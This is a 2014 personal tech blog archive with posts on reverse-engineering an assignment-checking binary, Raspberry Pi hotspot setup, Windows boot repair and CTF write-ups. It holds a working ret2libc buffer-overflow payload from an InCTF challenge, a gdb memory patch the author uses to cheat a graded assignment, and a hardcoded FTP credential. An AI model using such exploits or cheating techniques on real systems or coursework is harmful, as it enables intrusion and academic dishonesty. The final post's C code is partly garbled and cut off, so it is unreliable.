Nehal J. Wani's Blog: 2014

Saturday, August 23, 2014

Playing with a simple 64 bit binary (Cheating an assignment)

So, I heard some people discussing: "What was the binary doing which was given to us to evaluate our assignment?" To those who don't know, the assignment was to install ArchLinux in one's laptop. So, I took a look at the binary, and came up with the following stuff:

➜  /home/wani/Something  objdump -D eval > eval_dump   
➜  /home/wani/Something  strings eval          
/lib64/ld-linux-x86-64.so.2
libc.so.6
exit
fopen
perror
__isoc99_scanf
fgetc
strlen
getchar
fclose
fprintf
__libc_start_main
__gmon_start__
GLIBC_2.7
GLIBC_2.2.5
UH-H
fffff.
AWAVA
AUATL
[]A\A]A^A_
Full Name: 
Roll No.:
/proc/version
Error while opening the file.
;*3$"
➜  /home/wani/Something

The interesting strings are: "Full Name:", "Roll No.:" and "/proc/version". Let us analyze a small part of the main section of the binary's dump:

[...]
00000000004007b6 <main>:
  4007b6:       55                      push   %rbp
  4007b7:       48 89 e5                mov    %rsp,%rbp               #Stack Stuff
  4007ba:       48 81 ec f0 0b 00 00    sub    $0xbf0,%rsp
  4007c1:       c7 45 fc 00 00 00 00    movl   $0x0,-0x4(%rbp)
  4007c8:       bf 48 0a 40 00          mov    $0x400a48,%edi          #Argument to printf, address of string: "Full Name:"
  4007cd:       b8 00 00 00 00          mov    $0x0,%eax
  4007d2:       e8 49 fe ff ff          callq  400620 <printf@plt>
  4007d7:       48 8d 85 00 fc ff ff    lea    -0x400(%rbp),%rax
  4007de:       48 89 c6                mov    %rax,%rsi
  4007e1:       bf 54 0a 40 00          mov    $0x400a54,%edi          #Format specifier for scanf: %[^\n]
  4007e6:       b8 00 00 00 00          mov    $0x0,%eax
  4007eb:       e8 b0 fe ff ff          callq  4006a0 <__isoc99_scanf@plt>
  4007f0:       e8 5b fe ff ff          callq  400650 <getchar@plt> 
  4007f5:       bf 5a 0a 40 00          mov    $0x400a5a,%edi          #Argument to printf, address of string: "Roll No.:"
  4007fa:       b8 00 00 00 00          mov    $0x0,%eax
  4007ff:       e8 1c fe ff ff          callq  400620 <printf@plt>
  400804:       48 8d 85 10 f4 ff ff    lea    -0xbf0(%rbp),%rax
  40080b:       48 89 c6                mov    %rax,%rsi
  40080e:       bf 54 0a 40 00          mov    $0x400a54,%edi          #Format specifier for scanf: %[^\n]
  400813:       b8 00 00 00 00          mov    $0x0,%eax
  400818:       e8 83 fe ff ff          callq  4006a0 <__isoc99_scanf@plt>
  40081d:       be 64 0a 40 00          mov    $0x400a64,%esi          #Argument to fopen, address of string: "r"
  400822:       bf 66 0a 40 00          mov    $0x400a66,%edi          #Argument to fopen, address of string: "/proc/version"
  400827:       e8 54 fe ff ff          callq  400680 <fopen@plt>
  40082c:       48 89 45 f0             mov    %rax,-0x10(%rbp)
  400830:       48 83 7d f0 00          cmpq   $0x0,-0x10(%rbp)
  400835:       75 14                   jne    40084b <main+0x95>      #Equality check, if fopen fails, goto: 40084b
  400837:       bf 78 0a 40 00          mov    $0x400a78,%edi
  40083c:       e8 4f fe ff ff          callq  400690 <perror@plt>
  400841:       bf ff ff ff ff          mov    $0xffffffff,%edi
  400846:       e8 65 fe ff ff          callq  4006b0 <exit@plt>
  40084b:       eb 16                   jmp    400863 <main+0xad>
[...]

Let us confirm whether the addresses are indeed pointing to what I claim they are pointing to. In the same dump file:

[...]
  400a48:       46 75 6c                rex.RX jne 400ab7 <_IO_stdin_used+0x77>
  400a4b:       6c                      insb   (%dx),%es:(%rdi)
  400a4c:       20 4e 61                and    %cl,0x61(%rsi)
  400a4f:       6d                      insl   (%dx),%es:(%rdi)
  400a50:       65 3a 20                cmp    %gs:(%rax),%ah
[...]
  400a59:       00 52 6f                add    %dl,0x6f(%rdx)
  400a5c:       6c                      insb   (%dx),%es:(%rdi)
  400a5d:       6c                      insb   (%dx),%es:(%rdi)
  400a5e:       20 4e 6f                and    %cl,0x6f(%rsi)
  400a61:       2e 3a 00                cmp    %cs:(%rax),%al
[...]
  400a64:       72 00                   jb     400a66 <_IO_stdin_used+0x26>
[...]
  400a66:       2f                      (bad)  
  400a67:       70 72                   jo     400adb <_IO_stdin_used+0x9b>
  400a69:       6f                      outsl  %ds:(%rsi),(%dx)
  400a6a:       63 2f                   movslq (%rdi),%ebp
  400a6c:       76 65                   jbe    400ad3 <_IO_stdin_used+0x93>
  400a6e:       72 73                   jb     400ae3 <_IO_stdin_used+0xa3>
  400a70:       69 6f 6e 00 00 00 00    imul   $0x0,0x6e(%rdi),%ebp
[...]
➜  /home/wani/Something  python
Python 2.7.3 (default, Mar 13 2014, 11:03:55) 
[GCC 4.7.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> hex2chr = lambda(x): chr(int('0x'+str(x), 16))
>>> f = lambda(x): map(hex2chr, x)
>>> ''.join(f(['46', '75', '6c', '6c', '20', '4e', '61', '6d', '65', '3a']))
'Full Name:'
>>> ''.join(f(['52', '6f', '6c', '6c', '20', '4e', '6f', '2e', '3a']))
'Roll No.:'
>>> ''.join(f(['72']))
'r'
>>> ''.join(f(['2f', 70, '72', '6f', '63', '2f', '76', '65', '72', '73', '69', '6f', '6e']))
'/proc/version'
>>>

So it seems like the program only needs to capture the output of the file /proc/version, get your roll number and name, do some vodoo-magic with it, print out another weird binary.
It is time to start cheating. Google for the output of the file /proc/version for Archlinux and save it to a file, say in /aroc/version. Now, fire gdb

➜  /home/wani/Something  gdb eval
GNU gdb (GDB) 7.4.1-debian
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:
...
Reading symbols from /home/wani/Something/eval...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x4007ba
(gdb) r
Starting program: /home/wani/Something/eval 

Breakpoint 1, 0x00000000004007ba in main ()
(gdb) info files
Symbols from "/home/wani/Something/eval".
Unix child process:
 Using the running image of child process 11358.
 While running this, GDB does not access memory from...
Local exec file:
 `/home/wani/Something/eval', file type elf64-x86-64.
 Entry point: 0x4006c0
 0x0000000000400200 - 0x000000000040021c is .interp
 0x000000000040021c - 0x000000000040023c is .note.ABI-tag
 0x000000000040023c - 0x0000000000400260 is .note.gnu.build-id
 0x0000000000400260 - 0x000000000040027c is .gnu.hash
 0x0000000000400280 - 0x00000000004003b8 is .dynsym
 0x00000000004003b8 - 0x000000000040043f is .dynstr
 0x0000000000400440 - 0x000000000040045a is .gnu.version
 0x0000000000400460 - 0x0000000000400490 is .gnu.version_r
 0x0000000000400490 - 0x00000000004004a8 is .rela.dyn
 0x00000000004004a8 - 0x00000000004005c8 is .rela.plt
 0x00000000004005c8 - 0x00000000004005e2 is .init
 0x00000000004005f0 - 0x00000000004006c0 is .plt
 0x00000000004006c0 - 0x0000000000400a32 is .text
 0x0000000000400a34 - 0x0000000000400a3d is .fini
 0x0000000000400a40 - 0x0000000000400aa2 is .rodata #readonly stuff is present here. (not exactly readonly for gdb though)
 0x0000000000400aa4 - 0x0000000000400ad8 is .eh_frame_hdr
 0x0000000000400ad8 - 0x0000000000400bcc is .eh_frame
[...]
(gdb) find /b 0x0000000000400a40, 0x0000000000400aa2, 'p', 'r', 'o', 'c'
0x400a67
1 pattern found.
(gdb) p (char *)0x400a67
$1 = 0x400a67 "proc/version"
(gdb) set {char}0x400a67 = 'a'
(gdb) p (char *)0x400a67
$2 = 0x400a67 "aroc/version"
(gdb) c
Continuing.
Full Name: Nehal J Wani
Roll No.:201125005
[Inferior 1 (process 11358) exited normally]
(gdb) quit
➜  /home/wani/Something

So, essentially, we have changed the binary by pausing it at runtime, changing the value of a char in the memory and fooling the program to read from /aroc/version instead of /proc/version. Since the content will be same, the voodoo-magic will also print the same output in the resulting weird binary. See, I didn't even install ArchLinux and still got full marks :P Now, for quenching the curiosity for knowing the vodoo-thingy, let us analyze the rest of the binary.

[...]
  40084d:       8b 45 fc                mov    -0x4(%rbp),%eax                  #Looping stuff through file 
  400850:       8d 50 01                lea    0x1(%rax),%edx
  400853:       89 55 fc                mov    %edx,-0x4(%rbp)
  400856:       48 98                   cltq   
  400858:       0f b6 55 ef             movzbl -0x11(%rbp),%edx
  40085c:       88 94 05 30 f4 ff ff    mov    %dl,-0xbd0(%rbp,%rax,1)          #Store contents of entire file to $rbp-0xbd0
  400863:       48 8b 45 f0             mov    -0x10(%rbp),%rax
  400867:       48 89 c7                mov    %rax,%rdi
  40086a:       e8 c1 fd ff ff          callq  400630 <fgetc@plt>
  40086f:       88 45 ef                mov    %al,-0x11(%rbp)
  400872:       80 7d ef ff             cmpb   $0xff,-0x11(%rbp)                #EOF check
  400876:       75 d5                   jne    40084d <main+0x97>               #jump, baby, jump! 
  400878:       83 6d fc 01             subl   $0x1,-0x4(%rbp)
  40087c:       8b 45 fc                mov    -0x4(%rbp),%eax
  40087f:       48 98                   cltq   
  400881:       c6 84 05 30 f4 ff ff    movb   $0x0,-0xbd0(%rbp,%rax,1)
  400888:       00   
  400889:       48 8b 45 f0             mov    -0x10(%rbp),%rax
  40088d:       48 89 c7                mov    %rax,%rdi
  400890:       e8 6b fd ff ff          callq  400600 <fclose@plt>
  400895:       48 8d 85 10 f4 ff ff    lea    -0xbf0(%rbp),%rax                #My Roll Number is stored at $rbp-0xbf0
  40089c:       be 97 0a 40 00          mov    $0x400a97,%esi                   #0x400a97 holds the value "w"
  4008a1:       48 89 c7                mov    %rax,%rdi
  4008a4:       e8 d7 fd ff ff          callq  400680 <fopen@plt>               #Open file by the name: $myrollnumber
  4008a9:       48 89 45 f0             mov    %rax,-0x10(%rbp)
  4008ad:       48 8d 85 00 fc ff ff    lea    -0x400(%rbp),%rax                #My Name is stored at $rbp-0x400
  4008b4:       48 89 c7                mov    %rax,%rdi
  4008b7:       e8 54 fd ff ff          callq  400610 <strlen@plt>
  4008bc:       89 45 e8                mov    %eax,-0x18(%rbp)                 #$rbp-0x18 stores the length of my name 
  4008bf:       c7 45 fc 00 00 00 00    movl   $0x0,-0x4(%rbp)                  #Loop counter
  4008c6:       eb 21                   jmp    4008e9 <main+0x133>              #Start of loop 
  4008c8:       8b 45 fc                mov    -0x4(%rbp),%eax                  #Loop counter
  4008cb:       48 98                   cltq   
  4008cd:       0f b6 84 05 00 fc ff    movzbl -0x400(%rbp,%rax,1),%eax
  4008d4:       ff   
  4008d5:       f7 d0                   not    %eax 
  4008d7:       89 c2                   mov    %eax,%edx                        #name[i] = ~name[i]
  4008d9:       8b 45 fc                mov    -0x4(%rbp),%eax
  4008dc:       48 98                   cltq   
  4008de:       88 94 05 00 fc ff ff    mov    %dl,-0x400(%rbp,%rax,1)
  4008e5:       83 45 fc 01             addl   $0x1,-0x4(%rbp)                  #Increment counter
  4008e9:       8b 45 fc                mov    -0x4(%rbp),%eax
  4008ec:       3b 45 e8                cmp    -0x18(%rbp),%eax
  4008ef:       7c d7                   jl     4008c8 <main+0x112>              #Jump, baby, jump! 
  4008f1:       48 8d 85 10 f4 ff ff    lea    -0xbf0(%rbp),%rax
  4008f8:       48 89 c7                mov    %rax,%rdi
  4008fb:       e8 10 fd ff ff          callq  400610 <strlen@plt>              #Length of $myrollnumber
  400900:       89 45 e8                mov    %eax,-0x18(%rbp)
  400903:       c7 45 fc 00 00 00 00    movl   $0x0,-0x4(%rbp)                  #Initialize loop counter to 0 
  40090a:       eb 21                   jmp    40092d <main+0x177>
  40090c:       8b 45 fc                mov    -0x4(%rbp),%eax
  40090f:       48 98                   cltq   
  400911:       0f b6 84 05 10 f4 ff    movzbl -0xbf0(%rbp,%rax,1),%eax
  400918:       ff   
  400919:       f7 d0                   not    %eax                             #roll[i] = ~roll
  40091b:       89 c2                   mov    %eax,%edx
  40091d:       8b 45 fc                mov    -0x4(%rbp),%eax
  400920:       48 98                   cltq   
  400922:       88 94 05 10 f4 ff ff    mov    %dl,-0xbf0(%rbp,%rax,1)          #Store modified contents
  400929:       83 45 fc 01             addl   $0x1,-0x4(%rbp)
  40092d:       8b 45 fc                mov    -0x4(%rbp),%eax
  400930:       3b 45 e8                cmp    -0x18(%rbp),%eax
  400933:       7c d7                   jl     40090c <main+0x156>              #Jump, baby, jump! 
  400935:       48 8d 85 30 f4 ff ff    lea    -0xbd0(%rbp),%rax
  40093c:       48 89 c7                mov    %rax,%rdi
  40093f:       e8 cc fc ff ff          callq  400610 <strlen@plt>              #Length of entire file /proc/version
  400944:       89 45 e8                mov    %eax,-0x18(%rbp)
  400947:       c7 45 fc 00 00 00 00    movl   $0x0,-0x4(%rbp)                  #Initialize loop counter to 0 
  40094e:       eb 21                   jmp    400971 <main+0x1bb>
  400950:       8b 45 fc                mov    -0x4(%rbp),%eax
  400953:       48 98                   cltq   
  400955:       0f b6 84 05 30 f4 ff    movzbl -0xbd0(%rbp,%rax,1),%eax
  40095c:       ff   
  40095d:       f7 d0                   not    %eax                             #file[i] = ~file[i]
  40095f:       89 c2                   mov    %eax,%edx
  400961:       8b 45 fc                mov    -0x4(%rbp),%eax
  400964:       48 98                   cltq   
  400966:       88 94 05 30 f4 ff ff    mov    %dl,-0xbd0(%rbp,%rax,1)          #Store modified contents
  40096d:       83 45 fc 01             addl   $0x1,-0x4(%rbp)
  400971:       8b 45 fc                mov    -0x4(%rbp),%eax
  400974:       3b 45 e8                cmp    -0x18(%rbp),%eax
  400977:       7c d7                   jl     400950 <main+0x19a>              #Jump, baby, jump! 
  400979:       48 8d b5 30 f4 ff ff    lea    -0xbd0(%rbp),%rsi
  400980:       48 8d 8d 10 f4 ff ff    lea    -0xbf0(%rbp),%rcx
  400987:       48 8d 95 00 fc ff ff    lea    -0x400(%rbp),%rdx
  40098e:       48 8b 45 f0             mov    -0x10(%rbp),%rax
  400992:       49 89 f0                mov    %rsi,%r8
  400995:       be 99 0a 40 00          mov    $0x400a99,%esi                   #Format specifier: "%s\n%s\n%s"
  40099a:       48 89 c7                mov    %rax,%rdi
  40099d:       b8 00 00 00 00          mov    $0x0,%eax
  4009a2:       e8 b9 fc ff ff          callq  400660 <fprintf@plt>             #Print all three modified strings to file $myrollnumber
  4009a7:       48 8b 45 f0             mov    -0x10(%rbp),%rax
  4009ab:       48 89 c7                mov    %rax,%rdi
  4009ae:       e8 4d fc ff ff          callq  400600 <fclose@plt>
  4009b3:       b8 00 00 00 00          mov    $0x0,%eax
  4009b8:       c9                      leaveq 
  4009b9:       c3                      retq   
[...]

So, now the equivalent C program can be easily written.

#include <stdio.h>
#include <string.h>

int main() {
   FILE *fp;
   int c;
   int i = 0;
   char file[1024];
   char roll[10];
   char name[30];
   printf("%s ", "Full Name:");
   scanf("%[^\n]", name);
   getchar();
   printf("%s ", "Roll No.:");
   scanf("%[^\n]", roll);

   fp = fopen("/proc/version","r");
   if (fp == NULL) {
      perror("Error while opening the file.\n");
      return(-1);
   }
   do {
      file[i++] = fgetc(fp);
      if (feof(fp)) {
          break ;
      }
   } while(1);

   fclose(fp);

   fp = fopen(roll, "w");

   for (i = 0; i < strlen(name); i++)
       name[i] = ~name[i];

   for (i = 0; i < strlen(roll); i++)
       roll[i] = ~roll[i];

   for (i = 0; i < strlen(file); i++)
       file[i] = ~file[i];

   fprintf(fp, "%s\n%s\n%s", name, roll, file);
   fclose(fp);

   return(0);
}

Sunday, July 13, 2014

Configuring Wireless Access Point or Hotspot on a RaspberryPi using Edimax EW-7811UN

After you have setup raspbian on your raspberrypi, do the following:

sudo apt-get update #Bring 'em all

Since we don't want to depend on external DHCP server (by bridging network interfaces) to hand over leases, we will setup our own DHCP server for our private wifi network. Read about dnsmasq

sudo apt-get install dnsmasq

Let's setup dnsmasq configuration. Edit the file `/etc/dnsmasq.conf`

interface=wlan0
expand-hosts
domain=local
dhcp-range=192.168.60.10,192.168.60.255,24h
dhcp-option=3,192.168.60.1

The drivers that come with linux kernel do not support our Edimax device to behave as an Access Point by default. Realtek has been generous enough to provide the necessary drivers to do so. Visit http://www.realtek.com/downloads/ to download the driver for your particular device (Mine is RTL8188cus. Type the command lshw to know about yours). After downloading the driver, do the following:

sudo apt-get remove hostapd
wget ftp://WebUser:n8W9ErCy@95.130.192.218/cn/wlan/RTL8188C_8192C_USB_linux_v4.0.2_9000.20130911.zip
unzip RTL8188C_8192C_USB_linux_v4.0.2_9000.20130911.zip
cd RTL8188C_8192C_USB_linux_v4.0.2_9000.20130911
cd wpa_supplicant_hostapd/
tar -xf wpa_supplicant_hostapd-0.8_rtw_r7475.20130812.tar.gz
cd wpa_supplicant_hostapd-0.8_rtw_r7475.20130812
cd hostapd
sudo make install

Now we need to edit the file `/etc/hostapd.conf` to enter our configuration for wireless AP.

# Basic configuration
interface=wlan0
ssid=NoFreeLoaders
channel=1
#bridge=br0

# WPA and WPA2 configuration
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=3
wpa_passphrase=8em10h_kc01reh8
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP

# Hardware configuration
driver=rtl871xdrv
ieee80211n=1
hw_mode=g
device_name=RTL8192CUS #Replace this with the name of your device.
manufacturer=Realtek

Next, create the file `/etc/init.d/hostapd` (it is needed so that we can control the hostapd program as a service) and make sure it's contents are:

#!/bin/sh

### BEGIN INIT INFO
# Provides:             hostapd
# Required-Start:       $remote_fs
# Required-Stop:        $remote_fs
# Should-Start:         $network
# Should-Stop:
# Default-Start:        2 3 4 5
# Default-Stop:         0 1 6
# Short-Description:    Advanced IEEE 802.11 management daemon
# Description:          Userspace IEEE 802.11 AP and IEEE 802.1X/WPA/WPA2/EAP
#                       Authenticator
### END INIT INFO

PATH=/sbin:/bin:/usr/sbin:/usr/bin
DAEMON_SBIN=/usr/local/bin/hostapd
DAEMON_CONF=/etc/hostapd.conf
NAME=hostapd
DESC="advanced IEEE 802.11 management"
PIDFILE=/var/run/hostapd.pid

[ -x "$DAEMON_SBIN" ] || exit 0
[ -n "$DAEMON_CONF" ] || exit 0

DAEMON_OPTS="-B -P $PIDFILE $DAEMON_OPTS $DAEMON_CONF"

. /lib/lsb/init-functions

case "$1" in
  start)
        log_daemon_msg "Starting $DESC" "$NAME"
        start-stop-daemon --start --oknodo --quiet --exec "$DAEMON_SBIN" \
                --pidfile "$PIDFILE" -- $DAEMON_OPTS >/dev/null
        log_end_msg "$?"
        ;;
  stop)
        log_daemon_msg "Stopping $DESC" "$NAME"
        start-stop-daemon --stop --oknodo --quiet --exec "$DAEMON_SBIN" \
                --pidfile "$PIDFILE"
        log_end_msg "$?"
        ;;
  reload)
        log_daemon_msg "Reloading $DESC" "$NAME"
        start-stop-daemon --stop --signal HUP --exec "$DAEMON_SBIN" \
                --pidfile "$PIDFILE"
        log_end_msg "$?"
        ;;
  restart|force-reload)
        $0 stop
        sleep 8
        $0 start
        ;;
  status)
        status_of_proc "$DAEMON_SBIN" "$NAME"
        exit $?
        ;;
  *)
        N=/etc/init.d/$NAME
        echo "Usage: $N {start|stop|restart|force-reload|reload|status}" >&2
        exit 1
        ;;
esac

exit 0

Then, we need to change make it executable and enable it (along with dnsmasq) to be executed every time the system starts:

chmod a+x /etc/init.d/hostapd
sudo update-rc.d dnsmasq defaults
sudo update-rc.d hostapd defaults

Next, edit the file `/etc/network/interfaces` and make it look something like this:

auto lo

iface lo inet loopback
iface eth0 inet dhcp

allow-hotplug wlan0
iface wlan0 inet static
address 192.168.60.1
network 192.168.60.0
netmask 255.255.255.0
broadcast 192.168.60.255

The above config states that the configuration for loopback interface 'lo' is automatic, interface 'eth0' requires a DHCP server for ip address, interface 'wlan0' (brought in by our Edimax EW-7811UN) has a static configuration, in which, it's ip address is 192.168.60.1, it lies in the subnet 192.168.60.0 with netmask 255.255.255.0 (i.e. 192.168.60.0/24 in CIDR format) and 192.168.60.255 is the broadcast ID for the network. Also, hot-plugging of this interface is allowed.
Next, we configure our rpi to support ipv4 forwarding. Open the file `/etc/sysctl.conf` add make sure the file has this line:

net.ipv4.ip_forward=1

Read about IP forwarding here. Make sure that the above change is applied.

sudo sysctl -p

Next, we need to add firewall rules so that NATting can take place nicely.

sudo echo -e "iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE\n\
iptables --append FORWARD --in-interface wlan0 -j ACCEPT" > /etc/network/if-up.d/router.sh
sudo chmod +x /etc/network/if-up.d/router.sh

Next, we need to make sure that our wlan0 interface is up and running and also the iptables rules are applied automatically if the system restarts. (We need to make them persistent). To do that, add the following two lines before 'exit 0' in `/etc/rc.local`

ifup wlan0
/etc/network/if-up.d/router.sh

Now, reboot and enjoy your rpi as linux wireless router! xD

Sunday, April 13, 2014

Creating Boot Files for Windows EFI Partition


DISKPART> sel disk 0

Disk 0 is now the selected disk.

DISKPART> list vol

  Volume ###  Ltr  Label        Fs     Type        Size     Status     Info
  ----------  ---  -----------  -----  ----------  -------  ---------  --------
  Volume 0     E                       DVD-ROM         0 B  No Media
  Volume 1     C                NTFS   Partition    195 GB  Healthy    Boot
  Volume 2         WINRE        NTFS   Partition    400 MB  Healthy    Hidden
  Volume 3                      FAT32  Partition    260 MB  Healthy    System

DISKPART> sel vol 3

Volume 3 is the selected volume.

DISKPART> assign letter=b:

DiskPart successfully assigned the drive letter or mount point.

cd /d b:\EFI\Microsoft\Boot\

bootrec /fixboot

ren BCD BCD.bak

bcdboot c:\Windows /l en-gb /s b: /f ALL

bootrec /fix

bootrec /fixmbr

Saturday, April 5, 2014

How to run executable files on a NTFS partition

$ tail -1 /etc/fstab
/dev/sdaX                  /media/extras            ntfs-3g fmask=0022,dmask=0000,uid=1000,gid=1000 0 0

Thursday, March 6, 2014

InCTF 2014 Bin8 WriteUp

challenge8@inctf:~$ ldd challenge8
 linux-gate.so.1 =>  (0xf7ffd000)
 libc.so.6 => /lib32/libc.so.6 (0xf7e4e000)
 /lib/ld-linux.so.2 (0x56555000)
challenge8@inctf:~$ gdb challenge8
Reading symbols from /home/challenge8/challenge8...done.
(gdb) break main
Reading in symbols for /home/challenge8/challenge8.c...done.
Breakpoint 1 at 0x80484ab: file /home/challenge8/challenge8.c, line 17.
(gdb) r
Starting program: /home/challenge8/challenge8
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from system-supplied DSO at 0xf7fdb000...(no debugging symbols found)...done.
Reading symbols from /lib32/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib32/libc.so.6

Breakpoint 1, main (argc=1, argv=0xffffd6f4) at /home/challenge8/challenge8.c:17
17 /home/challenge8/challenge8.c: No such file or directory.
(gdb) x system
0xf7e6b250 : 0x891cec83
(gdb) find 0xf7e4e000,  0xffffffff,  "/bin/sh"
0xf7f8aa2c
warning: Unable to access target memory at 0xf7fd0f34, halting search.
1 pattern found.
(gdb) x/s 0xf7f8aa2c
0xf7f8aa2c:  "/bin/sh"
(gdb) quit
A debugging session is active.

 Inferior 1 [process 790] will be killed.

Quit anyway? (y or n) y
challenge8@inctf:~$ id
uid=1016(challenge8) gid=1016(challenge8) groups=1016(challenge8),1001(ctf)
challenge8@inctf:~$ ./challenge8 `python -c 'print "A" * 76+ "\x50\xb2\xe6\xf7" + "AAAA" + "\x2c\xaa\xf8\xf7"'`
This is the content of buffer: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP���AAAA,��
$ id
uid=1016(challenge8) gid=1016(challenge8) egid=1017(flag8) groups=1016(challenge8),1001(ctf)
$ cat /home/flag8/flag8
v6rjR2kw3adHwbh4
$

Sunday, February 9, 2014

How To Install Legacy Catalyst ATI Drivers 13.1 in CentOS 6.5

Steps: 1. Downgrade Xorg

$ yum --disablerepo=\* --enablerepo=C6.3\* downgrade xorg\*
$ yum remove xorg-x11-drv-modesetting xorg-x11-drivers
$ yum downgrade xorg-x11-server-Xorg xorg-x11-server-common xorg-x11-server-utils xorg-x11-drv*

2. Install epel repository info

$ yum install http://download.fedoraproject.org/pub/epel/6/i386/epel-release-6-8.noarch.rpm

3. Install the drivers

$ yum -y install kmod-fglrx-legacy.x86_64 --enablerepo=elrepo-testing

4. Disable updates for specific packages

$ grep exclude /etc/yum.conf
exclude=xorg-x11-server-Xorg xorg-x11-server-common xorg-x11-server-utils xorg-x11-drv* kmod-fglrx* fglrx*x11-drv

5. Reboot!

$ reboot

Sunday, January 19, 2014

GhostInTheShellCode Write-Up lugkist

We were given a file full of some random fix length strings.

[Wani@Linux gits]$ cat lugkist
GVZSNG
AXZIOG
YNAISG
ASAIUG
IVPIOK
AXPIVG
PVZIUG
AXLIEG
YUPISK
AXASEG
GVZSSG
AXZSKG
PVPIXK
ZNASKG
LVPSOG
PVZSVK
IVASNG
GVPIEK
IVPSNK
PNZIKK
YNASSG
TVPSSK
LVZIVG
PVLSKG
PVLIVG
TNLING
ANLSUG
PVPSEG
AVASVK
LNLSXG
PVPSKK
LVPSXK
TNASXG
AXPSVG
GNLIUG
LNLSNG
TVLIOK
AVZINK
GNZSXG
IVAIVG
TVPIUK
LVLSSG
IVLSEG
AVLISK
YVAIKK
ZKPING
YVPIKG
LNZSUG
PVZSOG
AXZISG
YVASOK
ZNAING
AXPSUG
IVLSVG
AXLIKG
GVZIXG
IVASUG
TXGIEK
PNZIEK
YVLIXK
IVZSEG
AXLSOG
[Wani@Linux gits]$

Hint provided was: "Hints: lugkist: SLTIYG". On googling, one quickly comes across: http://nintendo-entertainment-system.weebly.com/game-cheats-2.html, which tells us that these codes are game genie codes. So, obviously, we needed to decode them.
Now, since online decoders required the person to enter the 62 codes manually, to decode them, I needed to write a program. So, I read the rules of decoding here and wrote the following python program:

def func(op):
    if op == 'A':
        return 0x0
    if op == 'P':
 return 0x1
    if op == 'Z':
 return 0x2
    if op == 'L':
 return 0x3
    if op == 'G':
 return 0x4
    if op == 'I':
 return 0x5
    if op == 'T':
 return 0x6
    if op == 'Y':
 return 0x7
    if op == 'E':
 return 0x8
    if op == 'O':
 return 0x9
    if op == 'X':
 return 0xA
    if op == 'U':
 return 0xB
    if op == 'K':
 return 0xC
    if op == 'S':
 return 0xD
    if op == 'V':
 return 0xE
    if op == 'N':
 return 0xF

import sys

n = [func(x) for x in sys.argv[1]]

address = 0x8000 + ((n[2] & 7) << 12)| ((n[4] & 7) << 8) | ((n[3] & 8) << 8) | ((n[1] & 7) << 4) | ((n[0] & 8) << 4) |  (n[3] & 7) |  (n[2] & 8);
data = ((n[1] & 7) << 4) | ((n[0] & 8) << 4) | (n[0] & 7) | (n[5] & 8);

print "%0x %0x"%(address, data)

Lets see what the output is!

[Wani@Linux gits]$ while read line ; do python genie.py $line ; done < lugkist  
af65 64
a125 20
8575 77
8355 50
9165 6d
9625 20
a365 61
b025 20
9535 3f
8825 20
ad65 64
ac25 20
9265 69
8c75 72
9965 63
ae65 69
8f65 65
9065 6c
9f65 6d
a475 79
8d75 77
9d65 6e
a665 63
bc65 61
b665 61
b775 76
bb75 70
9865 61
8e65 68
ba75 73
9c65 69
9a65 6b
8a75 76
9e25 20
b375 74
bf75 73
b165 6e
a765 68
aa75 74
8665 65
9365 6e
bd65 63
b865 65
b565 68
8465 6f
9745 42
9465 67
ab75 73
a965 61
a525 20
8965 6f
8775 72
9b25 20
be65 65
b425 20
a265 64
8b65 65
c025 2e
a075 79
b265 6f
a865 65
b925 20
[Wani@Linux gits]$

The second column seemed to have numbers which seem printable characters. But the address are not. So, making a few changes:

address_ = int(str("%0x"%address), 16) 
print "%d %d"%(address_, data)

Lets see the output now:

[Wani@Linux gits]$ while read line ; do python genie.py $line ; done < lugkist  | awk '{printf  "%c",$2}' | sed ':a;N;$!ba;s/\n/ /g'
d wPm a ? d ircielmywncaavpahsikv tsnhtencehoBgsa or e de.yoe [Wani@Linux gits]$

Looks a little messed. Lets try this sorting according to memory. (Remember assembly instructions in memory?)

[Wani@Linux gits]$ while read line ; do python genie.py $line ; done < lugkist  | sort -k1n | awk '{printf  "%c",$2}' | sed ':a;N;$!ba;s/\n/ /g'
Power overwhelming? Back in my day cheats did not have spaces.[Wani@Linux gits]$

GhostInTheShellCode Write-Up Dogecrypt

We were provided with a file encrypted in vim. The hint given was: "Solveable in <5m. Much attack very wamerican-small". wamerican-small is a debian package whose info can be found here. It was evident that brute force had to be applied. Now, to decrypt the files using a key, I found the following perl program online at perlmonks.

use Inline C;

my $password = ;
chomp($password);
my $file = "lol";

open F, $file or die $!;
my $data = do{ local $/;  };
close F;

decode( $data, $password );
print "After:\n$data\n";

__END__
__C__
typedef unsigned int  ULG;

void decode( SV* str, char *passwd ) 
{
    ULG s,t,v,crc_32_tab[256],keys[3],temp;
    STRLEN rawlen;
    int decrypted = 0;
    char *file, *data;
    char *magic = "VimCrypt~01!\0";
#define ROTOR(a) { \
    keys[0] = CRC32(keys[0], a); keys[1] += keys[0] & 0xff; \
    keys[1] = keys[1] * 134775813L + 1; \
    keys[2] = CRC32(keys[2], (int)(keys[1] >> 24)); \
}
#define CRC32(c, b) (crc_32_tab[((int)(c) ^ (b)) & 0xff] ^ ((c) >> 8))

    file = (char*)SvPV(str, rawlen);
    if ( rawlen == 0 ) return;  /* we got a null string */
    
    while ( *magic != '\0' ) {
        if ( *(magic++) != *(file++) ) return; /* did not find magic header */
    }
    
    for (t=0; t<256 data-blogger-escaped-for="" data-blogger-escaped-s="" data-blogger-escaped-t="" data-blogger-escaped-v="(v">> 1) ^ ((v & 1) * (ULG)0xedb88320L);
        crc_32_tab[t] = v;
    }
    
    keys[0] = 305419896L; keys[1] = 591751049L; keys[2] = 878082192L;
    
    while (*passwd != '\0') ROTOR(*(passwd++));
    
    data = file;
    while( *file != '\0' ) {
        temp = 0xffff & (keys[2] | 2);
